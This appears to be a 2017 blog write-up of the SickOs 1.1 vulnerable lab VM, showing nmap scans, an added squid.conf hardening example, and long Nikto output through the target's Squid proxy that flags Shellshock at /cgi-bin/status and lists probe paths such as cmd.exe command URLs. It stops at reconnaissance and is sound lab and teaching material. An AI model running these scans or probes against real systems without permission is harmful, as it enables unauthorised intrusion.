Thursday, 19 January 2017

SickOS 1.1

This document is for educational purposes only; I take no responsibility for other people's actions. This is a review of the SickOs 1.1 vulnerable VM:
https://www.vulnhub.com/entry/sickos-11,132/
Home-brewed tools used: https://github.com/iuristanchev/pentesting_tools
_____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname    
 -----------------------------------------------------------------------------
 192.168.1.9     00:0c:29:41:9f:01     14     840  VMware, Inc.              



./nmap.sh 192.168.1.9

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Initiating ARP Ping Scan at 20:26
Scanning 192.168.1.9 [1 port]
Completed ARP Ping Scan at 20:26, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:26
Completed Parallel DNS resolution of 1 host. at 20:26, 0.10s elapsed
Nmap scan report for 192.168.1.9
Host is up (0.00017s latency).
MAC Address: 00:0C:29:41:9F:01 (VMware)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
           Raw packets sent: 1 (28B) | Rcvd: 1 (28B)

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00011s latency).
PORT   STATE    SERVICE
80/tcp filtered http
MAC Address: 00:0C:29:41:9F:01 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.44 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00016s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
MAC Address: 00:0C:29:41:9F:01 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.82 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00012s latency).
PORT    STATE         SERVICE
161/udp open|filtered snmp
MAC Address: 00:0C:29:41:9F:01 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.48 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00046s latency).
PORT     STATE    SERVICE       VERSION
21/tcp   filtered ftp
22/tcp   open     ssh           OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
23/tcp   filtered telnet
25/tcp   filtered smtp
53/tcp   filtered domain
80/tcp   filtered http
110/tcp  filtered pop3
111/tcp  filtered rpcbind
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
143/tcp  filtered imap
443/tcp  filtered https
445/tcp  filtered microsoft-ds
993/tcp  filtered imaps
995/tcp  filtered pop3s
1723/tcp filtered pptp
3306/tcp filtered mysql
3389/tcp filtered ms-wbt-server
5900/tcp filtered vnc
8080/tcp closed   http-proxy
MAC Address: 00:0C:29:41:9F:01 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms 192.168.1.9

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.78 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00015s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open   http-proxy Squid http proxy 3.1.19
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:GET
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
8080/tcp closed http-proxy
MAC Address: 00:0C:29:41:9F:01 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.44 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.47 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00017s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
|_banner: SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.1
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:41:9F:01 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.38 seconds
() Status: Up
     
Set 192.168.1.9:3128 as the HTTP proxy for the next scan, since nmap reports a Squid proxy listening on that port.
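
The nmap results above show 80/tcp filtered from the network while Squid 3.1.19 on 3128 is flagged as a potentially open proxy, so anything the proxy will relay to its own host sidesteps that filtering. As an added example (not from the original post, and not the VM's actual configuration, which the page does not show), these squid.conf access rules contrast an assumed permissive setup with a restricted one. The `localnet` range and the `to_self` ACL name are assumptions chosen for this lab network.

```conf
# --- Permissive form (assumed; shown commented out) -----------------------
# Any client may relay to any destination, including services on the
# proxy host itself that the firewall hides from the network.
# http_port 3128
# http_access allow all

# --- Restricted form -------------------------------------------------------
http_port 3128

# Clients allowed to use the proxy (constructed value for this lab subnet).
acl localnet src 192.168.1.0/24

# Destinations that are the proxy host itself: loopback plus its LAN address.
# "to_self" is a name chosen here; dst also matches hostnames that resolve
# to these addresses.
acl to_self dst 127.0.0.0/8 0.0.0.0/32 192.168.1.9

acl SSL_ports port 443
acl Safe_ports port 80
acl Safe_ports port 443
acl CONNECT method CONNECT

# http_access rules are evaluated top to bottom; the first match decides.
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
http_access deny to_self
http_access allow localnet
http_access deny all
```

After editing, `squid -k parse` checks the file for syntax errors and `squid -k reconfigure` applies it.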

./http_scan_proxy.sh 192.168.1.9 80 3128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.9
+ Target Hostname:    192.168.1.9
+ Target Port:        80
+ Proxy:              192.168.1.9:3128
+ Using Encoding:     Random URI encoding (non-UTF8)
+ Start Time:         2017-01-11 21:06:01 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved via header: 1.0 localhost (squid/3.1.19)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128
+ Uncommon header 'x-cache' found, with contents: MISS from localhost
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ lines
+ Server leaks inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Sat Dec  5 02:35:02 2015
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Server banner has changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19' which may suggest a WAF, load balancer or proxy is in place
+ Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Uncommon header 'nikto-added-cve-2014-6278' found, with contents: true
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ /webcgi/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi-915/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi-bin/cart32.exe: request cart32.exe/cart32clientlist
+ /htbin/cart32.exe: request cart32.exe/cart32clientlist
+ /cgibin/cart32.exe: request cart32.exe/cart32clientlist
+ /cgis/cart32.exe: request cart32.exe/cart32clientlist
+ /scripts/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi-exe/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi-perl/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi-bin-sdb/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi/classified.cgi: Check Phrack 55 for info by RFP
+ /fcgi-bin/classified.cgi: Check Phrack 55 for info by RFP
+ /cgi-exe/classified.cgi: Check Phrack 55 for info by RFP
+ /cgi-bin-sdb/classified.cgi: Check Phrack 55 for info by RFP
+ /htbin/download.cgi: v1 by Matt Wright; check info in Phrack 55 by RFP
+ /cgi-win/download.cgi: v1 by Matt Wright; check info in Phrack 55 by RFP
+ /cgi-exe/download.cgi: v1 by Matt Wright; check info in Phrack 55 by RFP
+ /cgi-perl/download.cgi: v1 by Matt Wright; check info in Phrack 55 by RFP
+ /webcgi/flexform.cgi: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /cgi/flexform.cgi: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /cgi-bin/flexform.cgi: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /cgis/flexform.cgi: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /cgi-915/flexform: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /cgi-win/flexform: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /fcgi-bin/flexform: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /scripts/lwgate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /cgi-win/lwgate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /webcgi/LWGate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /cgi-915/LWGate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /cgi-bin/LWGate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /cgi-perl/LWGate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /cgibin/lwgate: Check Phrack 55 for info by RFP
+ /scripts/lwgate: Check Phrack 55 for info by RFP
+ /cgi-915/LWGate: Check Phrack 55 for info by RFP
+ /cgi/LWGate: Check Phrack 55 for info by RFP
+ /cgi-exe/LWGate: Check Phrack 55 for info by RFP
+ /webcgi/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgi-bin/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /htbin/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgis/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /scripts/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgi-exe/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgi-perl/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgi-bin-sdb/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgi-915/handler.cgi: Variation of Irix Handler? Has been seen from other CGI scanners.
+ /cgibin/handler.cgi: Variation of Irix Handler? Has been seen from other CGI scanners.
+ /fcgi-bin/handler.cgi: Variation of Irix Handler? Has been seen from other CGI scanners.
+ /cgi-exe/handler.cgi: Variation of Irix Handler? Has been seen from other CGI scanners.
+ /webcgi/finger: finger other users, may be other commands?
+ /cgi-bin/finger: finger other users, may be other commands?
+ /cgi-win/finger: finger other users, may be other commands?
+ /fcgi-bin/finger: finger other users, may be other commands?
+ /cgi-bin-sdb/finger: finger other users, may be other commands?
+ /htbin/finger.pl: finger other users, may be other commands?
+ /cgibin/finger.pl: finger other users, may be other commands?
+ /cgi-perl/finger.pl: finger other users, may be other commands?
+ /cgi-bin-sdb/finger.pl: finger other users, may be other commands?
+ /cgi-915/get32.exe: This can allow attackers to execute arbitrary commands remotely.
+ /cgi-win/get32.exe: This can allow attackers to execute arbitrary commands remotely.
+ /fcgi-bin/get32.exe: This can allow attackers to execute arbitrary commands remotely.
+ /cgi-perl/get32.exe: This can allow attackers to execute arbitrary commands remotely.
+ /cgibin/guestbook/passwd: GuestBook r4 from lasource.r2.ru stores the admin password in a plain text file.
+ /scripts/guestbook/passwd: GuestBook r4 from lasource.r2.ru stores the admin password in a plain text file.
+ /htbin/photo/protected/manage.cgi: My Photo Gallery management interface. May allow full access to photo galleries and more. Versions before 3.8 allowed anyone to view contents of any directory on systems.
+ /cgi-915/wrap.cgi: possible variation: comes with IRIX 6.2; allows to view directories
+ /fcgi-bin/wrap.cgi: possible variation: comes with IRIX 6.2; allows to view directories
+ /forums/config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-59620: /inc/common.load.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
+ /webcgi/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /cgi/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /htbin/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /cgibin/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /cgi-win/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /fcgi-bin/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /cgi-perl/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /webcgi/html2chtml.cgi: Html2Wml < 0.4.8 access local files via CGI, and more
+ /cgi-win/html2chtml.cgi: Html2Wml < 0.4.8 access local files via CGI, and more
+ /cgi-perl/html2wml.cgi: Html2Wml < 0.4.8 access local files via CGI, and more
+ /cgi-915/guestbook.cgi: May allow attackers to execute commands as the web daemon.
+ /scripts/guestbook.cgi: May allow attackers to execute commands as the web daemon.
+ /cgi-perl/guestbook.pl: May allow attackers to execute commands as the web daemon.
+ /cgi-bin-sdb/guestbook.pl: May allow attackers to execute commands as the web daemon.
+ /cgi/ss: Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.
+ /cgi-win/ss: Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.
+ /fcgi-bin/ss: Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.
+ /cgi-exe/ss: Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.
+ OSVDB-8204: /gb/index.php?login=true: gBook may allow admin login by setting the value 'login' equal to 'true'.
+ /htbin/gH.cgi: Web backdoor by gH
+ /scripts/gH.cgi: Web backdoor by gH
+ /cgi-win/gH.cgi: Web backdoor by gH
+ /fcgi-bin/gH.cgi: Web backdoor by gH
+ /cgi-bin-sdb/gm-cplog.cgi: GreyMatter log file defaults to mode 666 and contains login and passwords used to update the GM site. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.
+ /getaccess: This may be an indication that the server is running getAccess for SSO
+ /cgi-bin/gm.cgi: GreyMatter blogger may reveal user IDs/passwords through a gmrightclick-######.reg files (# are numbers), possibly in /archive or other archive location. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.
+ /cgis/gm.cgi: GreyMatter blogger may reveal user IDs/passwords through a gmrightclick-######.reg files (# are numbers), possibly in /archive or other archive location. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.
+ /cgi-915/AT-admin.cgi: Admin interface...
+ /cgi-bin-sdb/AT-admin.cgi: Admin interface...
+ /cgi-bin/mt-static/mt-check.cgi: Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.
+ /htbin/mt-static/mt-check.cgi: Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.
+ /cgibin/mt-static/mt-check.cgi: Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.
+ /cgi-915/mt/mt-check.cgi: Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.
+ /cgi-bin-sdb/mt/mt-check.cgi: Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.
+ /cgi/banner.cgi: This CGI may allow attackers to read any file on the system.
+ /fcgi-bin/banner.cgi: This CGI may allow attackers to read any file on the system.
+ /cgi-perl/banner.cgi: This CGI may allow attackers to read any file on the system.
+ /webcgi/bannereditor.cgi: This CGI may allow attackers to read any file on the system.
+ /cgi-bin/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgibin/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgis/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgi-win/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgi-exe/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgi-bin-sdb/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /webcgi/bizdb1-search.cgi: This CGI may allow attackers to execute commands remotely. See http://www.hack.co.za/daem0n/cgi/cgi/bizdb.htm
+ /cgi-bin/blog/mt-load.cgi: Movable Type weblog installation CGI found. May be able to reconfigure or reload.
+ /vgn/vr/Editing: Vignette CMS admin/maintenance script available.
+ OSVDB-17652: /SiteServer/admin/findvserver.asp: Gives a list of installed Site Server components.
+ OSVDB-2878: /cgibin/moin.cgi?test: MoinMoin 1.1 and prior contain at least two XSS vulnerabilities. Version 1.0 and prior also contains a XSLT related vulnerability
+ /clusterframe.jsp: Macromedia JRun 4 build 61650 remote administration interface is vulnerable to several XSS attacks.
+ /scripts/tools/dsnform: Allows creation of ODBC Data Source
+ /readme.eml: Remote server may be infected with the Nimda virus.
+ /ows/restricted%2eshow: OWS may allow restricted files to be viewed by replacing a character with its encoded equivalent.
+ /WEB-INF./web.xml: Multiple implementations of j2ee servlet containers allow files to be retrieved from WEB-INF by appending a '.' to the directory name. Products include Sybase EA Service, Oracle Containers, Orion, JRun, HPAS, Pramati and others. See http://www.westpoint.l
+ OSVDB-42680: /vider.php3: MySimpleNews may allow deleting of news items without authentication.
+ OSVDB-6181: /officescan/cgi/cgiChkMasterPwd.exe: Trend Micro Officescan allows you to skip the login page and access some CGI programs directly.
+ /webcgi/astrocam.cgi: Astrocam 1.4.1 contained buffer overflow http://www.securityfocus.com/bid/4684. Prior to 2.1.3 contained unspecified security bugs
+ /cgi-bin-sdb/astrocam.cgi: Astrocam 1.4.1 contained buffer overflow http://www.securityfocus.com/bid/4684. Prior to 2.1.3 contained unspecified security bugs
+ /webcgi/badmin.cgi: BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgraded.
+ /cgi-915/badmin.cgi: BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgraded.
+ /cgi-perl/badmin.cgi: BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgraded.
+ /webcgi/ezadmin.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /scripts/ezadmin.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgi-win/ezadmin.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgi-bin/ezboard.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgibin/ezboard.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgi-win/ezboard.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgi-exe/ezboard.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgi-bin/ezman.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /scripts/ezman.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ OSVDB-11741: /htbin/foxweb.exe: Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.
+ OSVDB-11741: /scripts/foxweb.exe: Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.
+ /cgi-915/mgrqcgi: This CGI from Magic Enterprise 8.30-5 and earlier is vulnerable to multiple buffer overflows. Upgrade to 9.x.
+ /fcgi-bin/mgrqcgi: This CGI from Magic Enterprise 8.30-5 and earlier is vulnerable to multiple buffer overflows. Upgrade to 9.x.
+ /cgi-exe/mgrqcgi: This CGI from Magic Enterprise 8.30-5 and earlier is vulnerable to multiple buffer overflows. Upgrade to 9.x.
+ /servlet/com.unify.servletexec.UploadServlet: This servlet allows attackers to upload files to the server.
+ /cgi-exe/uploader.exe: This CGI allows attackers to upload files to the server and then execute them.
+ /cgi-perl/uploader.exe: This CGI allows attackers to upload files to the server and then execute them.
+ /upload.asp: An ASP page that allows attackers to upload files to server
+ /uploadx.asp: An ASP page that allows attackers to upload files to server
+ /wa.exe: An ASP page that allows attackers to upload files to server
+ /webcgi/fpsrvadm.exe: Potentially vulnerable CGI program.
+ /scripts/fpsrvadm.exe: Potentially vulnerable CGI program.
+ /cgi-win/fpsrvadm.exe: Potentially vulnerable CGI program.
+ /cgi-bin-sdb/fpsrvadm.exe: Potentially vulnerable CGI program.
+ /vgn/ac/delete: Vignette CMS admin/maintenance script available.
+ /vgn/ac/edit: Vignette CMS admin/maintenance script available.
+ /vgn/jsp/style: Vignette CMS admin/maintenance script available.
+ OSVDB-41850: /mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb: MPCSoftWeb Guest Book passwords retrieved.
+ OSVDB-319: /scripts/mailit.pl: Sambar may allow anonymous email to be sent from any host via this CGI.
+ OSVDB-319: /cgi-bin-sdb/mailit.pl: Sambar may allow anonymous email to be sent from any host via this CGI.
+ OSVDB-11093: /cgi/%2e%2e/abyss.conf: The Abyss configuration file was successfully retrieved. Upgrade with the latest version/patches for 1.0 from http://www.aprelium.com/
+ OSVDB-11093: /cgis/%2e%2e/abyss.conf: The Abyss configuration file was successfully retrieved. Upgrade with the latest version/patches for 1.0 from http://www.aprelium.com/
+ OSVDB-6467: /pw/storemgr.pw: Encrypted ID/Pass for Mercantec's SoftCart, http://www.mercantec.com/, see http://www.mindsec.com/advisories/post2.txt for more information.
+ /shopa_sessionlist.asp: VP-ASP shopping cart test application is available from the web. This page may give the location of .mdb files which may also be available.
+ /typo3conf/localconf.php: TYPO3 config file found.
+ /typo/typo3conf/localconf.php: TYPO3 config file found.
+ OSVDB-4907: /vgn/license: Vignette server license file found.
+ /webcart/config/clients.txt: This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.
+ /ws_ftp.ini: Can contain saved passwords for FTP sites
+ /WS_FTP.ini: Can contain saved passwords for FTP sites
+ OSVDB-11871: /webcgi/MsmMask.exe: MondoSearch 4.4 may allow source code viewing by requesting MsmMask.exe?mask=/filename.asp where 'filename.asp' is a real ASP file.
+ OSVDB-11871: /cgi-exe/MsmMask.exe: MondoSearch 4.4 may allow source code viewing by requesting MsmMask.exe?mask=/filename.asp where 'filename.asp' is a real ASP file.
+ OSVDB-11871: /cgi-perl/MsmMask.exe: MondoSearch 4.4 may allow source code viewing by requesting MsmMask.exe?mask=/filename.asp where 'filename.asp' is a real ASP file.
+ OSVDB-11871: /cgi-bin-sdb/MsmMask.exe: MondoSearch 4.4 may allow source code viewing by requesting MsmMask.exe?mask=/filename.asp where 'filename.asp' is a real ASP file.
+ /cgibin/addbanner.cgi: This CGI may allow attackers to read any file on the system.
+ /fcgi-bin/addbanner.cgi: This CGI may allow attackers to read any file on the system.
+ /cgi-exe/addbanner.cgi: This CGI may allow attackers to read any file on the system.
+ /cgi/aglimpse.cgi: This CGI may allow attackers to execute remote commands.
+ /cgi-bin/aglimpse.cgi: This CGI may allow attackers to execute remote commands.
+ /cgibin/aglimpse.cgi: This CGI may allow attackers to execute remote commands.
+ /cgis/aglimpse.cgi: This CGI may allow attackers to execute remote commands.
+ /htbin/aglimpse: This CGI may allow attackers to execute remote commands.
+ /cgi-win/aglimpse: This CGI may allow attackers to execute remote commands.
+ /cgi-exe/aglimpse: This CGI may allow attackers to execute remote commands.
+ /cgibin/architext_query.cgi: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgi-exe/architext_query.cgi: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgi-bin/cmd.exe?/c+dir: cmd.exe can execute arbitrary commands
+ /fcgi-bin/cmd.exe?/c+dir: cmd.exe can execute arbitrary commands
+ /fcgi-bin/cmd1.exe?/c+dir: cmd1.exe can execute arbitrary commands
+ /cgibin/archie: Gateway to the unix command, may be able to submit extra commands
+ /cgis/archie: Gateway to the unix command, may be able to submit extra commands
+ /fcgi-bin/archie: Gateway to the unix command, may be able to submit extra commands
+ /cgi-perl/archie: Gateway to the unix command, may be able to submit extra commands
+ /webcgi/calendar.pl: Gateway to the unix command, may be able to submit extra commands
+ /cgi-bin/calendar.pl: Gateway to the unix command, may be able to submit extra commands
+ /cgi-perl/calendar.pl: Gateway to the unix command, may be able to submit extra commands
+ /webcgi/calendar: Gateway to the unix command, may be able to submit extra commands
+ /cgibin/calendar: Gateway to the unix command, may be able to submit extra commands
+ /cgi-win/calendar: Gateway to the unix command, may be able to submit extra commands
+ /htbin/fortune: Gateway to the unix command, may be able to submit extra commands
+ /cgibin/fortune: Gateway to the unix command, may be able to submit extra commands
+ /cgi-exe/fortune: Gateway to the unix command, may be able to submit extra commands
+ /cgi/redirect: Redirects via URL from form
+ /scripts/redirect: Redirects via URL from form
+ /cgi-win/redirect: Redirects via URL from form
+ /cgi-exe/redirect: Redirects via URL from form
+ /cgi-bin/uptime: Gateway to the unix command, may be able to submit extra commands
+ /cgibin/uptime: Gateway to the unix command, may be able to submit extra commands
+ /cgis/uptime: Gateway to the unix command, may be able to submit extra commands
+ /fcgi-bin/uptime: Gateway to the unix command, may be able to submit extra commands
+ /cgi-bin/wais.pl: Gateway to the unix command, may be able to submit extra commands
+ /fcgi-bin/wais.pl: Gateway to the unix command, may be able to submit extra commands
+ /names.nsf: User names and groups can be accessed remotely (possibly password hashes as well)
+ /webcgi/mail: Simple Perl mailing script to send form data to a pre-configured email address
+ /cgi-915/mail: Simple Perl mailing script to send form data to a pre-configured email address
+ /cgi/mail: Simple Perl mailing script to send form data to a pre-configured email address
+ /scripts/nph-error.pl: Gives more information in error messages
+ /cgi-perl/post-query: Echoes back result of your POST
+ /cgi-bin-sdb/post-query: Echoes back result of your POST
+ /cgi-915/query: Echoes back result of your GET
+ /htbin/query: Echoes back result of your GET
+ /scripts/query: Echoes back result of your GET
+ /fcgi-bin/query: Echoes back result of your GET
+ /cgibin/test-env: May echo environment variables or give directory listings
+ /cgis/test-env: May echo environment variables or give directory listings
+ /cgi-exe/test-env: May echo environment variables or give directory listings
+ /cgi-perl/test-env: May echo environment variables or give directory listings
+ /admin-serv/config/admpw: This file contains the encrypted Netscape admin password. It should not be accessible via the web.
+ /tree: WASD Server reveals the entire web root structure and files via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.
+ /852566C90012664F: This database can be read using the replica ID without authentication.
+ /hidden.nsf: This database can be read without authentication. Common database name.
+ /cgi-915/cgitest.exe: This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.
+ /cgi/cgitest.exe: This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.
+ /cgis/cgitest.exe: This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.
+ /cgi-perl/cgitest.exe: This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.
